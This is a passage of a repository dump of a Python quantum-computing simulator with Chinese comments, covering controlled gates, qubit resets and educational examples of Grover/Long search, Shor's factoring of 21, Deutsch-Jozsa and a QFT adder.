当bools比ctlQbs长时会截断bools, 而bools比ctlQbs短时\n 会使用True填充bools.\n\n Args:\n opr: 可控的量子位过程\n bools: bool列表\n ctlQbs: 控制位\n *args, **kwargs: 输入到过程的参数\n\n Returns:\n opr返回的值\n \"\"\"\n for bit, qubit in zip(bools, ctlQbs):\n if not bit:\n X(qubit)\n result = Controlled(opr, ctlQbs, *args, **kwargs)\n for bit, qubit in zip(bools, ctlQbs):\n if not bit:\n X(qubit)\n return result\n\n\ndef ControlledOnInt(opr: OperationLike, integer: int, ctlQbs: Qubits,\n *args: Any, **kwargs: Any) -> Any:\n \"\"\"整数控制过程\n\n 类似`Controlled`, 但只有控制位符合integer(而不是全部为1)时, 触发\n 过程opr. 当integer位数比ctlQbs长时会截断高位\n\n Args:\n opr: 可控的量子位过程\n integer: 目标整数\n ctlQbs: 控制位\n *args, **kwargs: 输入到过程的参数\n\n Returns:\n opr返回的值\n \"\"\"\n bits = Int2Bools(integer, len(ctlQbs))\n result = ControlledOnBools(opr, bits, ctlQbs, *args, **kwargs)\n return result\n\n\nclass _CNOT(QubitsOperation):\n \"\"\"CNOT门 (可逆XOR门)\n\n 两个量子位必须处于相同的量子位系统.\n\n Args:\n q0: 控制位\n q1: 被控制位\n \"\"\"\n def __init__(self) -> None:\n super().__init__()\n self.name = \"CNOT\"\n self.controllable = True\n\n def call(self, q0: Qubit, q1: Qubit) -> None:\n Controlled(X, q0.asQubits(), q1)\n\n def __call__(self, q0: Qubit, q1: Qubit) -> None:\n if Options.inputCheck:\n if not inSameSystem(q0, q1):\n raise ValueError(\"Two qubits are in different qubit system.\")\n if any(isControllingQubits(q0, q1)):\n raise ValueError(\"Controlled process operates controlling bit.\")\n if haveSameQubit(q0, q1):\n raise ValueError(\"Controlling bit and controlled bit \"\n \"should not be the same qubit.\")\n qbsys = q0.system\n sysStopTrack = qbsys.stopTracking\n if qbsys.canTrack() and self.trackable:\n qbsys.addTrack(self.name, q0.index, q1.index)\n qbsys.stopTracking = True\n self.call(q0, q1)\n if not sysStopTrack:\n qbsys.stopTracking = False\n\n\nclass _CCNOT(QubitsOperation):\n \"\"\"Toffoli门 (CCNOT门, 可逆AND门)\n\n 三个量子位必须处于相同的量子位系统.\n\n Args:\n q0: 控制位\n q1: 控制位\n q2: 被控制位\n \"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n self.name = \"CCNOT\"\n self.controllable = True\n\n def call(self, q0: Qubit, q1: Qubit, q2: Qubit) -> None:\n Controlled(X, q0 + q1, q2)\n\n def __call__(self, q0: Qubit, q1: Qubit, q2: Qubit) -> None:\n if Options.inputCheck:\n if not inSameSystem(q0, q1, q2):\n raise ValueError(\"Three qubits are in different qubit system.\")\n if any(isControllingQubits(q0, q1, q2)):\n raise ValueError(\"Controlled process operates controlling bit.\")\n if haveSameQubit(q0, q1, q2):\n raise ValueError(\"CCNOT gate accept 3 different qubits.\")\n qbsys = q0.system\n sysStopTrack = qbsys.stopTracking\n if qbsys.canTrack() and self.trackable:\n qbsys.addTrack(self.name, q0.index, q1.index, q2.index)\n qbsys.stopTracking = True\n self.call(q0, q1, q2)\n if not sysStopTrack:\n qbsys.stopTracking = False\n\n\nCNOT = _CNOT()\nCCNOT = _CCNOT()\nToffoli = CCNOT\n" }, { "alpha_fraction": 0.6654275059700012, "alphanum_fraction": 0.6710036993026733, "avg_line_length": 25.899999618530273, "blob_id": "c2549e35c2c6e27e13939e45cae79fb19f414e91", "content_id": "9fe2bfba137d5748d2796b97c11fe3d400e88700", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 704, "license_type": "no_license", "max_line_length": 81, "num_lines": 20, "path": "/nyasQuantumCalculate/RevCal/__init__.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom .HighLevel import *\nfrom .Operate import *\nfrom .System import *\nfrom . 
import Builtin\n\n\n__all__ = [\"BitsSystem\", \"Bit\", \"Bits\", \"TemporaryBit\", \"TemporaryBits\",\n \"BitsOperation\", \"Controlled\", \"ControlledOnBools\", \"ControlledOnInt\",\n \"ApplyToEach\", \"ApplyFromBools\", \"ApplyFromInt\", \"Toffoli\",\n \"Builtin\", \"Adder\"]\n\n\n\"\"\"\n强行模拟电子计算机的可逆逻辑计算. 没有相位, 叠加态, 纠缠等量子特性, 只有0和1.\n这个库用于以少内存开销验证逻辑电路的正确性. 见 `examples/others/Adder.py`\n\n这部分大部分方法是从 nyasQuantumCalculate 复制粘贴过来的, 并不能完全保证正常工作.\n\"\"\"\n" }, { "alpha_fraction": 0.636820912361145, "alphanum_fraction": 0.6388329863548279, "avg_line_length": 21.590909957885742, "blob_id": "c31e33f86f619e9f4f7dddc8aefa1feb110167a8", "content_id": "a6a110e82f2b48a29d5322b0996be557fa938796", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1216, "license_type": "no_license", "max_line_length": 75, "num_lines": 44, "path": "/nyasQuantumCalculate/Operate/ApplyMethod.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom typing import Iterable\n\nfrom .SingleQubitGate import *\nfrom nyasQuantumCalculate.Utils import *\nfrom nyasQuantumCalculate.System import *\n\n\n__all__ = [\"ApplyToEach\", \"ApplyFromBools\", \"ApplyFromInt\"]\n\n\ndef ApplyToEach(gate: SingleQubitGate, qbs: Qubits) -> None:\n \"\"\"把单量子位门作用到qbs的每个量子位上\"\"\"\n for qb in qbs:\n gate(qb)\n\n\ndef ApplyFromBools(gate: SingleQubitGate, bools: Iterable[bool],\n qbs: Qubits) -> None:\n \"\"\"使用bool控制单量子位门\n\n 把位门作用到bools里为True的相应索引的量子位上. bools和qbs长度不同时取最短.\n\n Args:\n gate: 需要作用的单量子位门\n bools: bool列表\n qbs: 多个量子位\"\"\"\n for b, qb in zip(bools, qbs):\n if b:\n gate(qb)\n\n\ndef ApplyFromInt(gate: SingleQubitGate, integer: int, qbs: Qubits) -> None:\n \"\"\"使用int控制单量子位门\n\n 如同`ApplyFromBools`差不多, 但bool列表从integer里推导.\n\n Args:\n gate: 需要作用的单量子位门\n integer: 控制用的整数\n qbs: 多个量子位\"\"\"\n bits = Int2Bools(integer, len(qbs))\n ApplyFromBools(gate, bits, qbs)\n" }, { "alpha_fraction": 0.5388994216918945, "alphanum_fraction": 0.5488615036010742, "avg_line_length": 24.095237731933594, "blob_id": "11b5a187453974ef5f20eb2cbc034c8c57523358", "content_id": "20d7022c88ebc3b2217bd72301496029ec27a002", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2328, "license_type": "no_license", "max_line_length": 75, "num_lines": 84, "path": "/nyasQuantumCalculate/Operate/Reset.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport numpy as np\n\nfrom .QubitsOperation import *\nfrom nyasQuantumCalculate.Utils import *\nfrom nyasQuantumCalculate.System import *\n\n\n__all__ = [\"R\", \"RA\"]\n\n\nclass _RESET(QubitsOperation):\n \"\"\"重置一个量子位\n\n 注意量子位只能重置振幅而不能重置相位, 如果可能的话\n 请使用位门偏转相位再重置量子位.\n\n Args:\n qb: 需要重置的量子位\n \"\"\"\n def __init__(self) -> None:\n super().__init__()\n self.name = \"RESET\"\n self.trackable = True\n\n def call(self, qb: Qubit) -> None:\n qbsys = qb.system\n states = qbsys.statesNd.swapaxes(0, qbsys.statesNdIndex(qb.index))\n prob0 = sss(states[0, ...])\n if equal0(prob0):\n states[0, ...] = states[1, ...]\n states[0, ...] /= np.sqrt(sss(states[0, ...]))\n states[1, ...] 
*= 0.\n\n def __call__(self, qb: Qubit) -> None:\n qbsys = qb.system\n sysStopTrack = qbsys.stopTracking\n if qbsys.canTrack() and self.trackable:\n qbsys.addTrack(self.name, qb.index)\n qbsys.stopTracking = True\n self.call(qb)\n if not sysStopTrack:\n qbsys.stopTracking = False\n\n\nclass _RESETALL(QubitsOperation):\n \"\"\"重置多个量子位\n\n 注意量子位只能重置振幅而不能重置相位, 如果可能的话\n 请使用位门偏转相位再重置量子位.\n\n Args:\n qbs: 需要重置的多个量子位\n \"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n self.name = \"RESETALL\"\n self.trackable = True\n\n def call(self, qbs: Qubits) -> None:\n qbsys = qbs.system\n for index in qbs.indexes:\n states = qbsys.statesNd.swapaxes(0, qbsys.statesNdIndex(index))\n prob0 = sss(states[0, ...])\n if equal0(prob0):\n states[0, ...] = states[1, ...]\n states[1, ...] *= 0.\n qbsys.normalize()\n\n def __call__(self, qbs: Qubits) -> None:\n qbsys = qbs.system\n sysStopTrack = qbsys.stopTracking\n if qbsys.canTrack() and self.trackable:\n qbsys.addTrack(self.name, *qbs.indexes)\n qbsys.stopTracking = True\n self.call(qbs)\n if not sysStopTrack:\n qbsys.stopTracking = False\n\n\nR = _RESET()\nRA = _RESETALL()\n" }, { "alpha_fraction": 0.5319721698760986, "alphanum_fraction": 0.6048911809921265, "avg_line_length": 32.51128005981445, "blob_id": "0768763f2a5fa187541e6772597bd5c273f05d9c", "content_id": "e9f9a125c0ec78a6a68da72341c42d94edb945e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5641, "license_type": "no_license", "max_line_length": 79, "num_lines": 133, "path": "/examples/5-LongAlgorithm.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport sys\nimport os\nsys.path.append(os.path.dirname(os.path.dirname(__file__)))\n\nfrom typing import Callable\n\nfrom numpy import pi, arcsin, sin, sqrt\n\nfrom nyasQuantumCalculate import *\nfrom nyasQuantumCalculate.Utils import Bools2Int\n\n\nOptions.autoNormalize = False\n\n\n########################## 改进 Grover 算法 ##################################\n\"\"\"\n值得注意的是, Grover搜索算法并不是迭代次数越多越精确的.\n记M为正确答案的数量, N为全部答案的数量, j = round(π / (4*arcsin(sqrt(M / N))) -.5),\n当迭代次数为j时, 测量出正确答案的机率比较大.\n当迭代次数为2*j时, 测量出错误答案机率比较大.\n3*j时为正确答案的机率大, 4*j时为错误答案, 以此类推\n\n记|Good❭为所有正确答案的叠加态, |Bad❭为所有错误状态的叠加态.\n则叠加态|ψ❭在相空间{O;|Bad❭,|Good❭}里是一个长度为1的矢态. 记均匀叠加态(H|0❭)^(⊗n)与\n|Bad❭之间的夹角为θ, 则每次运算Grover过程都会使|ψ❭在相空间里旋转2θ. 当|ψ❭与|Bad❭夹角\n为π/2时, 则|ψ❭与|Good❭夹角为0, 此时以概率1测出正确答案.\n但每次迭代一定会旋转2θ, 当迭代次数过多时会使|ψ❭向-|Bad❭转动, 以此类推.\n\n实际上θ = arcsin(sqrt(M / N)), 则迭代次数j = round(π / 4θ - .5)\n\"\"\"\n\"\"\"\nGrover算法一个致命缺点是旋转角度θ与迭代次数j无关, θ只与数据相关.\n龙桂鲁团队提出了一个改进版Grover算法, 被称作Long算法.\n这个算法从迭代次数j中得出旋转角度θ\n\"\"\"\n\"\"\"\nGrover过程, 也就是单次迭代记作G,\nG = -W(I-(exp(iφ)+1)|0❭❬0|)W(I-(exp(iφ)+1)|Good❭❬Good|).\n在Grover算法里, φ = π, 并且 -W(I-(exp(iφ)+1)|0❭❬0|)W 即为Grover扩散算子,\nI-(exp(iφ)+1)|Good❭❬Good|为需要搜索的黑盒.\n\n在Long算法里, φ = 2*arcsin(sin(π / (4*J+6)) / sinθ),\n其中J >= j_op = floor(π / 4θ - .5). 
则迭代次数j为J+1\n当J<j_op时, φ为复数, 这时Grover过程失去定义(非酉).\n也就是说Long算法并不会比Grover算法快.\n\"\"\"\n\n\n############################# 图形着色问题 ###################################\n\"\"\"此处的例子与4-GroverAlgorithm.py相同, 就不过多叙述了\n需要注意的是, 旋转门的角度需要在一开始就确定, 所以这里的计算顺序有所调整\"\"\"\n\n\nedges = [(0, 1), (0, 2), (0, 3), (1, 2), (1, 3), (2, 3), (3, 4)]\nnColorBits = 2\nnVertex = max(max(edge) for edge in edges) + 1\n\n\n# 计算迭代Grover过程的数量\nm = 72 # 正确答案的数量\nn = 2 ** (nColorBits * nVertex) # 所有答案的数量\ntheta = arcsin(sqrt(m / n)) # 均匀叠加态在相空间里的辐角\nj_op = int(pi / (4 * theta) - .5) # Grover算法最少迭代次数\nJ = j_op # Long算法里的可调参数, 这里选择运行最快的\nj = J + 1 # Long算法迭代的次数\n# Long算法里对相位旋转的角度\nphi = 2 * arcsin(sin(pi / (4 * J + 6)) / sin(theta))\nRO = R1(phi) # 相位旋转矩阵\n\n\ndef ColorEquality(c0: Qubits, c1: Qubits, target: Qubit):\n for q0, q1 in zip(c0, c1):\n Builtin.CNOT(q0, q1)\n ApplyToEach(Builtin.X, c1)\n Controlled(Builtin.X, c1, target)\n ApplyToEach(Builtin.X, c1)\n for q0, q1 in zip(c0, c1):\n Builtin.CNOT(q0, q1)\n\n\ndef ValidVertexColoring(register: Qubits, target: Qubit):\n assert len(register) == nColorBits * nVertex\n colors = [register[nColorBits*v: nColorBits*(v+1)] for v in range(nVertex)]\n with TemporaryQubits(register.system, len(edges)) as edgesResult:\n for (idx0, idx1), edgeResult in zip(edges, edgesResult):\n ColorEquality(colors[idx0], colors[idx1], edgeResult)\n ApplyToEach(Builtin.X, edgesResult)\n # target输入不再是|0❭-|1❭的相位反冲, 而是输入|1❭\"相位偏移\"(乱起的名字)\n Controlled(RO, edgesResult, target)\n ApplyToEach(Builtin.X, edgesResult)\n for (idx0, idx1), edgeResult in zip(edges, edgesResult):\n ColorEquality(colors[idx0], colors[idx1], edgeResult)\n\n\ndef LongSearch(f: Callable[[Qubits, Qubit], None],\n register: Qubits, nIter: int):\n ApplyToEach(Builtin.H, register)\n with TemporaryQubit(register.system) as target:\n # \"相位偏移\"使用|1❭, 而不是|0❭-|1❭\n Builtin.X(target)\n for _ in range(nIter):\n f(register, target)\n ApplyToEach(Builtin.H, register)\n ApplyToEach(Builtin.X, register)\n # 偏移均值相位, 而不是翻转\n Controlled(RO, register[0:-1], register[-1])\n ApplyToEach(Builtin.X, register)\n ApplyToEach(Builtin.H, register)\n Builtin.X(target)\n\n\nqbsys = QubitsSystem(nColorBits * nVertex)\nregister = qbsys.getQubits()\n\nLongSearch(ValidVertexColoring, register, j)\nresult = Builtin.MA(register)\nBuiltin.RA(register)\n\nfor v in range(nVertex):\n print(f\"Vertex {v} has color \"\n f\"{Bools2Int(result[nColorBits*v : nColorBits*(v+1)])}\")\n\n\n# edges=[(0,1),(0,2),(0,3),(1,2),(1,3),(2,3),(3,4)] 的解\nanswer = [108, 109, 110, 120, 121, 123, 156, 157, 158, 180, 182, 183, 216, 217,\n 219, 228, 230, 231, 300, 301, 302, 312, 313, 315, 396, 397, 398, 433,\n 434, 435, 456, 457, 459, 481, 482, 483, 540, 541, 542, 564, 566, 567,\n 588, 589, 590, 625, 626, 627, 708, 710, 711, 721, 722, 723, 792, 793,\n 795, 804, 806, 807, 840, 841, 843, 865, 866, 867, 900, 902, 903, 913,\n 914, 915]\nprint(f\"Is result correct: {Bools2Int(result) in answer}\")\n" }, { "alpha_fraction": 0.5165289044380188, "alphanum_fraction": 0.5296769142150879, "avg_line_length": 26.585493087768555, "blob_id": "852a2bbd29f9d57936385ff46883abb1cd4f7c89", "content_id": "67f48f987ec2d7ee7ee5422cb1a334971c782ed0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5948, "license_type": "no_license", "max_line_length": 79, "num_lines": 193, "path": "/examples/8-ShorAlgorithm.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport sys\nimport 
os\nsys.path.append(os.path.dirname(os.path.dirname(__file__)))\n\nfrom typing import Union, List\n\nfrom nyasQuantumCalculate import *\nfrom nyasQuantumCalculate.Builtin import *\n\n\nOptions.autoNormalize = False\nOptions.QFTswap = False\n\n\n###############################################################################\n\"\"\"下面的方法可以参考 https://www.bilibili.com/read/cv11142193\"\"\"\n\ndef PhaseModularAddInt(a: int, N: int, register: Qubits) -> None:\n sign = register[0]\n PhaseAddInt(a, register)\n IPhaseAddInt(N, register)\n IQFT(register)\n with TemporaryQubit(register.system) as tmp:\n CNOT(sign, tmp)\n QFT(register)\n Controlled(PhaseAddInt, tmp.asQubits(), N, register)\n IPhaseAddInt(a, register)\n IQFT(register)\n X(sign)\n CNOT(sign, tmp)\n X(sign)\n QFT(register)\n PhaseAddInt(a, register)\n\ndef IPhaseModularAddInt(a: int, N: int, register: Qubits) -> None:\n sign = register[0]\n IPhaseAddInt(a, register)\n IQFT(register)\n X(sign)\n with TemporaryQubit(register.system) as tmp:\n CNOT(sign, tmp)\n X(sign)\n QFT(register)\n PhaseAddInt(a, register)\n Controlled(IPhaseAddInt, tmp.asQubits(), N, register)\n IQFT(register)\n CNOT(sign, tmp)\n QFT(register)\n PhaseAddInt(N, register)\n IPhaseAddInt(a, register)\n\ndef ModularMultiplyIntAdd(a: int, N: int, x: Qubits, b: Qubits) -> None:\n QFT(b)\n for x_ele in x[::-1]:\n Controlled(PhaseModularAddInt, x_ele.asQubits(), a % N, N, b)\n a <<= 1\n IQFT(b)\n\ndef IModularMultiplyIntAdd(a: int, N: int, x: Qubits, b: Qubits) -> None:\n QFT(b)\n for x_ele in x[::-1]:\n Controlled(IPhaseModularAddInt, x_ele.asQubits(), a % N, N, b)\n a <<= 1\n IQFT(b)\n\ndef ModularInverse(a: int, N: int) -> int:\n old_r, r = a, N\n old_s, s = 1, 0\n while r > 1:\n quotient = old_r // r\n old_r, r = r, old_r - quotient * r\n old_s, s = s, old_s - quotient * s\n return s\n\ndef U_aN(a: int, N: int, register: Qubits) -> None:\n if a == 1:\n return\n with TemporaryQubit(register.system) as sign:\n x = sign + register\n with TemporaryQubits(x.system, len(x)) as tmp:\n ModularMultiplyIntAdd(a, N, x, tmp)\n for _x, _tmp in zip(x, tmp):\n SWAP(_x, _tmp)\n ia = ModularInverse(a, N)\n IModularMultiplyIntAdd(ia, N, x, tmp)\n\ndef GuessingPeriodR(j: int, n: int, N: int) -> List[int]:\n if j < 2 ** n / N:\n return list()\n cFrac = Utils.Frac2ContinuedFrac(j, 2 ** n)\n result: set[int] = set()\n for i in range(1, len(cFrac)):\n _, k = Utils.ContinuedFrac2Frac(cFrac[:i])\n if k >= N:\n break\n result.add(k)\n return list(result)\n\n\n###############################################################################\n\n\ndef RunQuantumPart(a: int, N: int, n: int,\n PhaseQubit: Qubit, register: Qubits) -> int:\n # 输入的是随机选择的整数a, 被分解的整数N, 求解精度n,\n # 和相位估计的量子位, 储存叠加态的寄存器\n\n # 因为化简版的相位估计是从U^(2^(n-1))开始计算,\n # 并且 (a^2)%N = ((a%N)^2)%N, 所以可以使用迭代计算所有(a^(2^l))%N\n a_s = [a]\n for _ in range(n - 1):\n a_s.append((a_s[-1] ** 2) % N)\n\n # 制备叠加特征态\n ApplyFromInt(X, 1, register)\n # 相位估计算法, 把测量结果放在一个列表里\n result = [False] * n\n phi = 0.\n for i in range(n):\n H(PhaseQubit)\n Controlled(U_aN, PhaseQubit.asQubits(), a_s[n - i - 1], N, register)\n R1(-2 * Utils.pi * phi)(PhaseQubit)\n H(PhaseQubit)\n res = M(PhaseQubit)\n if res: X(PhaseQubit)\n phi = phi / 2 + int(res) / 4\n result[n - i - 1] = res\n # 把测量结果转为整数然后输出\n R(PhaseQubit)\n RA(register)\n return Utils.Bools2Int(result)\n\ndef FromPeriodRGetFactor(a: int, N: int, r: int) -> Union[int, None]:\n # 从r中得到N的因数\n if r % 2 == 1:\n return\n b = a ** (r // 2)\n if b % N == N - 1:\n return\n # 因为这里的r很有可能不是真正的阶\n # 所以 gcd(b-1,N)!=1 也可能不符合\n 
c = Utils.gcd(b - 1, N)\n if c == 1:\n return\n return c\n\n\n###############################################################################\n\n\ndef RunShorAlgorithm(N: int) -> int:\n # 过滤N\n if N % 2 == 0:\n return 2\n # TODO: 这里应该加一步筛选 N=p^q 的传统算法\n # 但是实在找不到如何实现\n\n m = Utils.nBits(N) # 表示N的最少比特数\n n = 2 * m + 1 # 相位估计的求解精度\n # 初始化量子系统\n qbsys = QubitsSystem(1 + m)\n PhaseQubit = qbsys[0] # 用于相位估计的量子位\n register = qbsys[1:] # 用于储存特征态的量子位\n randomQubits = QubitsSystem(m)[:] # 使用量子计算机计算随机数\n\n # 开始算法\n factor = None # 已求得的因数\n while factor is None:\n # 得到随机整数a, 量子随机数输出范围为[0,2^m)\n # 这将以最低0.5的概率得到a [2,N-1)\n ApplyToEach(H, randomQubits)\n a = Utils.Bools2Int(MA(randomQubits))\n if a < 2 or a > N - 2:\n continue\n # 计算gcd(a,N), 如果不为1则得到N的因数\n b = Utils.gcd(a, N)\n if b != 1:\n factor = b\n continue\n # 使用量子计算器求得r的候选集\n j = RunQuantumPart(a, N, n, PhaseQubit, register)\n r_s = GuessingPeriodR(j, n, N)\n # 对候选集里的数字计算是否可以得到N的因数\n for r in r_s:\n factor = FromPeriodRGetFactor(a, N, r)\n if factor is not None:\n break\n # 输出\n RA(randomQubits)\n return factor\n\nprint(\"Find factor:\", RunShorAlgorithm(21))\n" }, { "alpha_fraction": 0.5797258019447327, "alphanum_fraction": 0.5928932428359985, "avg_line_length": 26.719999313354492, "blob_id": "5c0f292721e302f612ace4069eada07d16de4127", "content_id": "3422f0bf5b0002be9a7cf188b02dc250e09fc0f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6932, "license_type": "no_license", "max_line_length": 77, "num_lines": 200, "path": "/examples/2-DeutschJozsaAlgorithm.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport sys\nimport os\nsys.path.append(os.path.dirname(os.path.dirname(__file__)))\n\nimport numpy as np\n\nfrom nyasQuantumCalculate import *\n\n\n\n# Deutsche Jozsa 算法 是一个很好的展示量子计算的简单算法\n# 它足够简单, 只需要几个位门即可完成, 并且相比传统算法运算快很多*\n# *当然对于模拟量子计算来说是不会有速度提升的, 但是也不妨碍在这里用作例子\n\n\n################### 什么是 Deutsche Jozsa 算法 ################################\n\"\"\" Deutsche Jozsa 算法:\n\n有一个未知函数 f: {0,1}^n -> {0,1}*, 并且已知f要么是常数函数, 要么是均衡函数**, 判断f\n是常数函数还是均衡函数***\n\n* 按人话说就是f输入n个0或1, 然后输出一个0或1\n** 均衡的意思是, 在对于所有可能的输入来说, 有一半结果是0, 另外一半是1\n*** 只需要判断f是哪种类型的函数, 而不在意f的输出结果\n\"\"\"\n\n\n############################## 传统算法 #######################################\n\"\"\"\n把 f 的输入\"{0,1}^n\"可以看作\"[0,2^n)&Z\" (按人话来说就是从0到2^n但不包含2^n的整数)\n\n在传统算法里, 只能从0开始历遍, 当历遍到有值与之前的值不一致时, 说明f不是常数函数, 那必\n然是均衡函数. 
并且历遍超过可能输入的一半时, 说明f不是均衡函数, 是常数函数.\n\n按照上述思路, 实现算法至少需要2步, 至多需要2^(n-1)+1步\n\"\"\"\n\n# 这里提供几种常见的函数 (为了节省篇幅就省略一点空行了)\nclass UnknownFunctionClassical:\n def __init__(self, n: int = 0) -> None:\n raise NotImplementedError\n def __call__(self, x: int) -> bool:\n raise NotImplementedError\n\nclass Constant0C(UnknownFunctionClassical):\n def __init__(self, n: int) -> None:\n pass\n def __call__(self, x: int) -> bool:\n return False\n\nclass Constant1C(UnknownFunctionClassical):\n def __init__(self, n: int) -> None:\n pass\n def __call__(self, x: int) -> bool:\n return True\n\nclass IfNthBitC(UnknownFunctionClassical):\n # 如果第n个bit为1, 则返回1, 否则为0\n def __init__(self, n: int) -> None:\n self.tag = 1 << n\n def __call__(self, x: int) -> bool:\n return x & self.tag != 0\n\nclass Even1BitsC(UnknownFunctionClassical):\n # 如果有偶数个1, 则返回0, 否则为1\n def __init__(self, n: int) -> None:\n pass\n def __call__(self, x: int) -> bool:\n count = 0\n while x >= 1:\n if x & 1:\n count += 1\n x >>= 1\n return count & 1 == 0\n\nclass RandomFunC(UnknownFunctionClassical):\n def __init__(self, n: int) -> None:\n self.choice = np.array(())\n def setTotalBits(self, n: int) -> None:\n self.choice = np.random.choice(1 << n, 1 << (n - 1), False)\n def __call__(self, x: int) -> bool:\n return x in self.choice\n\n\n################# 算法本体\n\ndef DeutscheJozsaClassical(totalBits: int,\n func: UnknownFunctionClassical) -> bool:\n if isinstance(func, RandomFunC):\n func.setTotalBits(totalBits)\n # 如果func为常数函数则返回True, 否则为False\n f0 = func(0)\n steps = 1\n isConstant = True\n # python 的 range 并不包含最后一个数字a\n for x in range(1, (1 << (totalBits - 1)) + 1):\n steps += 1\n if func(x) != f0:\n isConstant = False\n break\n print(f\"Total Steps: {steps} (Classical)\")\n return isConstant\n\nprint(f\"Is constant function?(C): {DeutscheJozsaClassical(5, IfNthBitC(3))}\")\n# 可以自己尝试调一下数据试着运行\n\n\n\n############################### 量子算法 ######################################\n\"\"\"\n量子计算的一个巨大的优点就是并行运算. 这给了一点启示: 可以把f全部可能的输入都计算一遍,\n然后再统计结果.\n\n对于函数 f, 需要把它变为应该可以作用在量子位上的位门 U, 可以设计为如果f输出1, 则位门U\n把系统状态反转 (乘上-1).\n\n如果f是均衡函数, 那么量子系统里有一半的状态都被反转, 这时候把状态全部互相干涉的话, 结果\n不会在∣0❭聚集. 反之, 如果全部状态的相位抑制, 那么互相干涉后状态会在∣0❭聚集\n\"\"\"\n\n# 这里提供几种常见的函数 (为了节省篇幅就省略一点空行了)\nclass UnknownFunctionQuantum:\n def __init__(self, n: int = 0) -> None:\n raise NotImplementedError\n def __call__(self, qbs: Qubits) -> None:\n raise NotImplementedError\n\nclass Constant0Q(UnknownFunctionQuantum):\n def __init__(self, n: int) -> None:\n pass\n def __call__(self, qbs: Qubits) -> None:\n pass\n\nclass Constant1Q(UnknownFunctionQuantum):\n def __init__(self, n: int) -> None:\n self.reversStateGate = -1. 
* Builtin.I\n def __call__(self, qbs: Qubits) -> None:\n self.reversStateGate(qbs[0])\n\nclass IfNthBitQ(UnknownFunctionQuantum):\n def __init__(self, n: int) -> None:\n self.n = n\n\n def __call__(self, qbs: Qubits) -> None:\n if self.n >= len(qbs):\n return\n Builtin.Z(qbs[self.n])\n\nclass Even1BitsQ(UnknownFunctionQuantum):\n def __init__(self, n: int) -> None:\n pass\n def __call__(self, qbs: Qubits) -> None:\n ApplyToEach(Builtin.Z, qbs)\n\nclass RandomFunQ(UnknownFunctionQuantum):\n def __init__(self, n: int) -> None:\n pass\n def __call__(self, qbs: Qubits) -> None:\n n = len(qbs)\n choice = np.random.choice(1 << n, 1 << (n - 1), False)\n with TemporaryQubit(qbs.system) as tmQ:\n # 使用了所谓的\"相位反冲技巧\"\n Builtin.X(tmQ)\n Builtin.H(tmQ)\n for integer in choice:\n ControlledOnInt(Builtin.X, integer, qbs, tmQ)\n Builtin.H(tmQ)\n Builtin.X(tmQ)\n\n\n################# 算法本体\n\ndef DeutscheJozsaQuantum(totalBits: int,\n func: UnknownFunctionQuantum) -> bool:\n # 如果func为常数函数则返回True, 否则为False\n sytm = QubitsSystem(totalBits)\n qubits: Qubits = sytm[:]\n #DumpSystemFig(sytm) if have_matplotlib else DumpSystemText(sytm)\n\n ApplyToEach(Builtin.H, qubits)\n #DumpSystemFig(sytm) if have_matplotlib else DumpSystemText(sytm)\n\n func(qubits)\n #DumpSystemFig(sytm) if have_matplotlib else DumpSystemText(sytm)\n\n ApplyToEach(Builtin.H, qubits)\n #DumpSystemFig(sytm) if have_matplotlib else DumpSystemText(sytm)\n\n result = Builtin.MA(qubits)\n Builtin.RA(qubits)\n return not any(result)\n\nprint(f\"Is constant function?(Q): {DeutscheJozsaQuantum(5, Constant1Q(3))}\")\n# 可以自己尝试调一下数据试着运行\n\n\n####################### 强烈注意\n# 大多数情况下, DeutscheJozsa算法的示例是使用标记黑盒, 需要totalBits+1个量子位\n# 但这里是使用的是相位黑盒, 所以只需要totalBits个量子位\n" }, { "alpha_fraction": 0.6285714507102966, "alphanum_fraction": 0.6373626589775085, "avg_line_length": 22.947368621826172, "blob_id": "5fade20851e8a383e7b919d8bc18d2996ef67d43", "content_id": "df4a5aab97c6cb6ad343fc8fde6671265ba039ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 455, "license_type": "no_license", "max_line_length": 74, "num_lines": 19, "path": "/examples/others/AdderWithQFT.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "from nyasQuantumCalculate import *\nfrom nyasQuantumCalculate.Utils import *\n\nn = 3\n\nqbsys = QubitsSystem(2 * n)\nregisterA = qbsys[:n]\nregisterB = qbsys[n:]\n\nN = 1 << n\nfor a in range(N):\n for b in range(N):\n ApplyFromInt(Builtin.X, a, registerA)\n ApplyFromInt(Builtin.X, b, registerB)\n\n Add(registerA, registerB)\n\n print(f\"mod({a} + {b}, {N}) = {Bools2Int(Builtin.MA(registerB))}\")\n Builtin.RA(registerA + registerB)\n" }, { "alpha_fraction": 0.5011417865753174, "alphanum_fraction": 0.5304130911827087, "avg_line_length": 20.698198318481445, "blob_id": "9717c73dedac664b5fa49f39a3de2ffa1d7481aa", "content_id": "7bd3eef77c15ebf1317c0a91a825adcb5b311978", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5493, "license_type": "no_license", "max_line_length": 87, "num_lines": 222, "path": "/nyasQuantumCalculate/Utils.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": 